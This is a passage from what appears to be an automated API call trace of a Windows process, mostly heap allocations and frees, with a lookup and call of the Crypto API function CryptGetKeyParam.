hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.355] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.355] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0179.355] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0179.356] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0179.356] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.356] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0179.357] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.357] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0179.357] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0179.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.358] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0179.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0179.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0179.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0179.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.360] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0179.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0179.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0179.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0179.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0179.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0179.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0179.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0179.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0179.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0179.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0179.360] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c26e8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26e8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0179.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0179.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0179.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0179.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0179.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0179.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0179.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0179.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0179.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0179.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0179.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0179.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0179.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0179.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0179.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0179.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0179.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0179.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0179.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0179.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0179.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0179.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0179.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0179.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0179.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0179.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0179.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0179.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0179.363] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0179.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0179.363] RtlAllocateHeap 